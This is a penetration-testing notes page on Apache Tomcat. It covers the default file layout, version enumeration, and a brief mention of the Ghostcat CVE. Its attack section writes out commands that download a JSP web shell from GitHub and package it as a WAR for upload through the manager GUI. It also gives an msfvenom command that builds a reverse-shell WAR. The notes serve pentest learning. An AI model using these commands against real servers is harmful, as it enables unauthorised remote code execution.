> For the complete documentation index, see [llms.txt](https://ivalexev.gitbook.io/rednote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ivalexev.gitbook.io/rednote/pentesting-process/other/tomcat.md). # Tomcat Apache Tomcat is an open-source web server that hosts applications written in Java. ## Default File Structure ``` /opt/tomcat/ (Tomcat installation directory) ├── bin/ (Startup, shutdown, and management scripts) │ ├── catalina.sh (Main control script for Tomcat) │ ├── startup.sh (Starts Tomcat) │ ├── shutdown.sh (Stops Tomcat) │ ├── setenv.sh (Optional, sets environment variables) │ ├── digest.sh (Generates hashed passwords) │ ├── version.sh (Shows Tomcat version) │ ├── tool-wrapper.sh (Helper script for Java tools) │ ├── tomcat-juli.jar (Tomcat logging utility) │ ├── *.bat (Windows equivalent of shell scripts) ├── conf/ (Configuration files) │ ├── server.xml (Main configuration file) │ ├── web.xml (Default web application settings) │ ├── tomcat-users.xml (User roles and authentication) │ ├── tomcat-users.xsd (XML schema definition for `tomcat-users.xml`) │ ├── logging.properties (Logging configuration) │ ├── catalina.policy (Security policy for Java permissions) │ ├── catalina.properties (JVM properties) │ ├── context.xml (Default context settings) │ ├── jaspic-providers.xml (Java Authentication configuration) │ ├── jaas.config (Java Authentication and Authorization Service) ├── lib/ (Core Tomcat libraries) │ ├── servlet-api.jar (Servlet API) │ ├── tomcat-api.jar (Tomcat core API) │ ├── tomcat-util.jar (Utility classes) │ ├── ecj-*.jar (Eclipse Compiler for JSP) │ ├── jsp-api.jar (JSP API) │ ├── websocket-api.jar (WebSocket API) │ ├── *.jar (Additional dependencies) ├── logs/ (Log files) │ ├── catalina.out (Main log file) │ ├── localhost.log (Logs specific to the localhost container) │ ├── manager.log (Logs for Tomcat Manager application) │ ├── host-manager.log (Logs for Host Manager application) │ ├── *.log (Other logs) ├── temp/ (Temporary files) │ ├── tomcat.* (Temporary data storage for Tomcat) ├── webapps/ (Deployed applications) │ ├── ROOT/ (Default root application) │ │ ├── index.jsp (Default welcome page) │ │ ├── WEB-INF/ (Configuration files for the app) │ ├── manager/ (Tomcat Manager Web UI) │ │ ├── images/ (Icons and graphics for the UI) │ │ ├── META-INF/ (Metadata and security settings) │ │ └── WEB-INF/ (Application configurations) │ │ ├── web.xml (Defines servlet settings for the Manager app) │ ├── host-manager/ (Tomcat Virtual Host Manager) │ ├── docs/ (Tomcat documentation) │ ├── examples/ (Example applications) │ ├── myapp.war (Custom deployed application - .war file) │ ├── / (Custom web application) │ │ ├── images/ (Custom app images) │ │ ├── index.jsp (Main entry point of the app) │ │ ├── META-INF/ │ │ │ └── context.xml (Application-specific context configuration) │ │ ├── status.xsd (XML Schema for status validation) │ │ └── WEB-INF/ │ │ ├── jsp/ │ │ │ └── admin.jsp (Admin page JSP) │ │ ├── lib/ │ │ │ └── jdbc_drivers.jar (Database driver) │ │ ├── classes/ │ │ │ └── AdminServlet.class (Compiled Servlet for Admin) │ │ └── web.xml (<--- Defines servlet settings for customapp) ├── work/ (Compiled JSP files and runtime data) │ ├── Catalina/ (Compiled Java files for JSPs) │ │ ├── localhost/ │ │ │ ├── _ (Default webapp compilation) │ │ │ ├── myapp/ (Compiled JSPs for a deployed application) └── LICENSE (License information) └── NOTICE (Legal notices) └── RELEASE-NOTES (Release notes) ``` ## Manual Enumeration ### Version
Error Pagehttp://<DOMAIN>:<PORT>/invalid
/docshttp://<DOMAIN>:<PORT>/docs/ | grep Tomcat
## Attacks Many Tomcat installations provide a GUI interface to manage the application. This interface is available at `/manager/html` by default, which only users assigned the `manager-gui` role are allowed to access. Valid manager credentials can be used to upload a packaged Tomcat application (`.WAR` file) and compromise the application. A WAR, or Web Application Archive, is used to quickly deploy web applications and backup storage. {% code overflow="wrap" %} ```bash wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp zip -r backup.war cmd.jsp ``` {% endcode %} Click on `Browse` to select the .war file and then click on `Deploy`.\ This file is uploaded to the manager GUI, after which the `/backup` application will be added to the table. If we click on `backup`, we will get redirected to `http://:/backup/`. We need to specify the `cmd.jsp` file in the URL to get us with a web shell. We can also use [msfvenom](/rednote/pentesting-process/software-attacks/shellcode.md#msfvenom) {% code overflow="wrap" %} ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > backup.war ``` {% endcode %} ## CVE
CVE-2020-1938Ghostcat
Unauthenticated LFI in all Tomcat versions before 9.0.31, 8.5.51, and 7.0.100. The exploit can only read files and folders within the web apps folder.
--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/other/tomcat.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.